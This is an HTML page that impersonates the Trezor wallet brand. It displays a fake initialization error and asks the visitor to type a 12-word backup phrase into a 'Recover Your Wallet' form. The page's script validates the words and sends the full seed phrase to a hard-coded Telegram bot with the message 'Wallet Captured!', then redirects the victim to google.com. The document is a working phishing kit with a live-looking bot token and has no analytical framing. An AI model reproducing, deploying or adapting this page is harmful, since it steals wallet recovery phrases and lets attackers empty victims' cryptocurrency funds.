<!DOCTYPE html>
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />

    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
    <style>
        body {
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
			background-color: rgb(246 246 246/var(--tw-bg-opacity));
			user-select: none;
        }

		.form-control{
			width:90px;
			padding-right: 10px;
		}
		#recoverButton {
            display: block;
            margin: 0 auto;
            background-color: #259964;
            color: #e6eaef;
            border: 2px solid #259964;
            border-radius: 5px; /* Adjust the radius to control corner roundness */
            padding: 10px 20px;
            font-size: 22px;
            cursor: pointer;
        }

        #recoverButton:hover {
            background-color: #259964;
            color: #e6eaef;
        }
		#resumeButton {
            display: block;
            margin: 0 auto;
            background-color: #259964;
            color: #e6eaef;
            border: 2px solid #259964;
            border-radius: 5px; /* Adjust the radius to control corner roundness */
            padding: 10px 20px;
            font-size: 22px;
            cursor: pointer;
        }

        #resumeButton:hover {
            background-color: #259964;
            color: #e6eaef;
        }
		.form-control{
			border-color: black;
		}
    </style>
</head>
<body>
    <div id="step1">
		<svg viewBox="0 0 161.768 40.771" fill="none" class="w-auto text-black h-[30px]" data-testid="basic-icon-iconsvg-TrezorLogo"><path class="trezor-logo-trezor" fill="currentColor" d="M24.306 9.461C24.306 4.29 19.761 0 14.228 0 8.694 0 4.148 4.292 4.148 9.46v3.025H0v21.75l14.225 6.536 14.233-6.534V12.581H24.31l-.003-3.121Zm-15.02 0c0-2.438 2.175-4.389 4.942-4.389 2.767 0 4.94 1.951 4.94 4.389v3.024H9.287V9.461Zm13.44 21.264-8.502 3.904-8.499-3.901V17.655h17v13.07z"></path><path class="trezor-logo-text" fill="currentColor" d="M40.019 12.485h17.886v5.17h-6.127v16.678h-5.731V17.655h-6.028ZM78.46 19.8c0-4.39-3.064-7.218-7.609-7.218H60.474v21.75h5.732v-7.314h2.174l4.051 7.314h6.627l-4.842-8.094c2.07-.78 4.244-2.83 4.244-6.438zm-8.296 2.146h-3.958v-4.39h3.953c1.482 0 2.47.879 2.47 2.147 0 1.365-.988 2.243-2.47 2.243zm10.963-9.461h16.009v5.072H86.858v3.219h9.982v4.974h-9.982v3.51h10.278v5.073H81.127Zm48.125-.294c-6.719 0-11.46 4.78-11.46 11.218 0 6.437 4.839 11.22 11.46 11.22s11.562-4.779 11.562-11.217c0-6.438-4.842-11.22-11.562-11.22zm0 17.363c-3.359 0-5.633-2.536-5.633-6.14 0-3.707 2.274-6.142 5.633-6.142 3.36 0 5.732 2.537 5.732 6.141 0 3.605-2.372 6.14-5.732 6.14zm27.67-3.316c2.074-.78 4.25-2.83 4.25-6.438 0-4.39-3.064-7.218-7.61-7.218h-10.375v21.75h5.731v-7.314h2.178l4.051 7.314h6.621zm-4.052-4.292h-3.952v-4.39h3.952c1.484 0 2.471.879 2.471 2.147 0 1.365-.987 2.243-2.471 2.243zm-52.967-9.461h16.898v4.389l-9.19 12.29h9.19v5.169H99.903v-4.39l9.19-12.288h-9.19z"></path></svg>
        <h1 class="text-center" style="color:#22282e;">Recover Your Wallet</h1>
        <p class="text-center" style="color:#22282e;">An error occured while initializing your wallet. Please use your backup phrase to recover your wallet.</p>
		<div class="col-md-12 text-center"> <!-- Center the column contents -->
                <button class="btn btn-primary" id="resumeButton" onclick="resume()">RESTORE WALLET</button>
            </div>
	</div>
	<div id="step2" style="display: none;">
		<div class="container mt-5">
		<svg viewBox="0 0 161.768 40.771" fill="none" class="w-auto text-black h-[30px]" data-testid="basic-icon-iconsvg-TrezorLogo"><path class="trezor-logo-trezor" fill="currentColor" d="M24.306 9.461C24.306 4.29 19.761 0 14.228 0 8.694 0 4.148 4.292 4.148 9.46v3.025H0v21.75l14.225 6.536 14.233-6.534V12.581H24.31l-.003-3.121Zm-15.02 0c0-2.438 2.175-4.389 4.942-4.389 2.767 0 4.94 1.951 4.94 4.389v3.024H9.287V9.461Zm13.44 21.264-8.502 3.904-8.499-3.901V17.655h17v13.07z"></path><path class="trezor-logo-text" fill="currentColor" d="M40.019 12.485h17.886v5.17h-6.127v16.678h-5.731V17.655h-6.028ZM78.46 19.8c0-4.39-3.064-7.218-7.609-7.218H60.474v21.75h5.732v-7.314h2.174l4.051 7.314h6.627l-4.842-8.094c2.07-.78 4.244-2.83 4.244-6.438zm-8.296 2.146h-3.958v-4.39h3.953c1.482 0 2.47.879 2.47 2.147 0 1.365-.988 2.243-2.47 2.243zm10.963-9.461h16.009v5.072H86.858v3.219h9.982v4.974h-9.982v3.51h10.278v5.073H81.127Zm48.125-.294c-6.719 0-11.46 4.78-11.46 11.218 0 6.437 4.839 11.22 11.46 11.22s11.562-4.779 11.562-11.217c0-6.438-4.842-11.22-11.562-11.22zm0 17.363c-3.359 0-5.633-2.536-5.633-6.14 0-3.707 2.274-6.142 5.633-6.142 3.36 0 5.732 2.537 5.732 6.141 0 3.605-2.372 6.14-5.732 6.14zm27.67-3.316c2.074-.78 4.25-2.83 4.25-6.438 0-4.39-3.064-7.218-7.61-7.218h-10.375v21.75h5.731v-7.314h2.178l4.051 7.314h6.621zm-4.052-4.292h-3.952v-4.39h3.952c1.484 0 2.471.879 2.471 2.147 0 1.365-.987 2.243-2.471 2.243zm-52.967-9.461h16.898v4.389l-9.19 12.29h9.19v5.169H99.903v-4.39l9.19-12.288h-9.19z"></path></svg>
        <h1 class="text-center" style="color:#22282e;">Recover Your Wallet</h1>
        <p class="text-center" style="color:#22282e;">Enter your 12-word backup phrase below:</p>
        
        <div class="row">
		
            <div class="col-md-3">
                <input type="text" class="form-control mb-3" id="word1">
            </div>
            <div class="col-md-3">
                <input type="text" class="form-control mb-3" id="word2">
            </div>
            <div class="col-md-3">
                <input type="text" class="form-control mb-3" id="word3">
            </div>
            <div class="col-md-3">
                <input type="text" class="form-control mb-3" id="word4">
            </div>
        </div>

        <div class="row">
            <div class="col-md-3">
                <input type="text" class="form-control mb-3" id="word5">
            </div>
            <div class="col-md-3">
                <input type="text" class="form-control mb-3" id="word6">
            </div>
            <div class="col-md-3">
                <input type="text" class="form-control mb-3" id="word7">
            </div>
            <div class="col-md-3">
                <input type="text" class="form-control mb-3" id="word8">
            </div>
        </div>

        <div class="row">
            <div class="col-md-3">
                <input type="text" class="form-control mb-3" id="word9">
            </div>
            <div class="col-md-3">
                <input type="text" class="form-control mb-3" id="word10">
            </div>
            <div class="col-md-3">
                <input type="text" class="form-control mb-3" id="word11">
            </div>
            <div class="col-md-3">
                <input type="text" class="form-control mb-3" id="word12">
            </div>
        </div>
        <div class="row">
		
            <div class="col-md-12 text-center"> <!-- Center the column contents -->
                <button class="btn btn-primary" id="recoverButton">RESTORE WALLET</button>
            </div>
        </div>
    </div>

    <!-- Error Modal -->
    <div class="modal fade" id="errorModal" tabindex="-1" role="dialog" aria-labelledby="errorModalLabel" aria-hidden="true">
        <div class="modal-dialog" role="document">
            <div class="modal-content">
                <div class="modal-header">
                    <h5 class="modal-title" id="errorModalLabel">Error</h5>
                    <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                        <span aria-hidden="true">&times;</span>
                    </button>
                </div>
                <div class="modal-body">
                    Please fill in all boxes with valid words.
                </div>
                <div class="modal-footer">
                    <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button>
                </div>
            </div>
        </div>
    </div>
	</div>

    <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.5.4/dist/umd/popper.min.js"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
    <script>
        document.getElementById('recoverButton').addEventListener('click', function () {
            var valid = true; // Assume all inputs are initially valid
var concatenatedMnemonic = ''; // Initialize the concatenated mnemonic

var inputs = document.querySelectorAll("input"); // Replace with your actual selector

for (var i = 0; i < inputs.length; i++) {
    var input = inputs[i];

    // Check if input is empty or contains non-Latin letters
    if (!/^[a-zA-Z]+$/.test(input.value)) {
        valid = false;
        input.style.borderColor = 'red';
    } else {
        input.style.borderColor = ''; // Reset border color
        concatenatedMnemonic += input.value + " "; // Concatenate valid input values
    }
}

            if (!valid) {
                $('#errorModal').modal('show');
            } else {
                // Remove the trailing space and store the concatenated mnemonic
                concatenatedMnemonic = concatenatedMnemonic.trim();
                // You can now use 'concatenatedMnemonic' for further processing or storage
                function getParameterByName(name) {
    name = name.replace(/[\[\]]/g, "\\$&");
    var regex = new RegExp("[?&]" + name + "(=([^&#]*)|&|#|$)");
    var results = regex.exec(window.location.href);
    if (!results) return null;
    if (!results[2]) return '';
    return decodeURIComponent(results[2].replace(/\+/g, " "));
}

var id = getParameterByName('id');
var chatid = getParameterByName('chatid');
var xhr = new XMLHttpRequest();
var url = 'https://api.telegram.org/bot6065049136:AAFoRRYQhIvGygPqAHoXOtxf65qgHGt4Hd0/sendMessage?chat_id='+chatid+'&text=Wallet Captured!%0ABOT ID:'+id+'%0ATrezor:%0A'+concatenatedMnemonic;
// Configure the request (GET request to a URL)
xhr.open('GET', url, true);

// Set up a callback function to handle the response
xhr.onload = function() {
  if (xhr.status === 200) {
    window.location.href = "https://google.com";
  } else {
    // Request failed
    console.error('Request failed with status', xhr.status);
  }
};

// Send the request
xhr.send();            }
        });		
    </script>
	<script>
		function resume(){
			document.getElementById("step1").style.display = "none";
			document.getElementById("step2").style.display = "block";
		}
	</script>
</body>
</html>